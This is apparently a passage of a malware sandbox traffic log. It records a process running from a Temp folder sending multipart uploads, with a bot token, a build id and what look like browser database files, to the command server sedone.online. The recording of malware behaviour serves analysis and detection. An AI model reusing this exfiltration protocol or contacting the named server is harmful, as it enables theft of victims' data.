                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                  Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.449856116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:33 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAIE3WB
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:33 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------MY58GDTJM7GVAAAIE3WBCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.449866116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----TJWTR1VSJEKF37YUA168
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 169765
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 54 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------TJWTR1VSJEKF37YUA168Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------TJWTR1VSJEKF37YUA168Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------TJWTR1VSJEKF37YUA168Cont
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
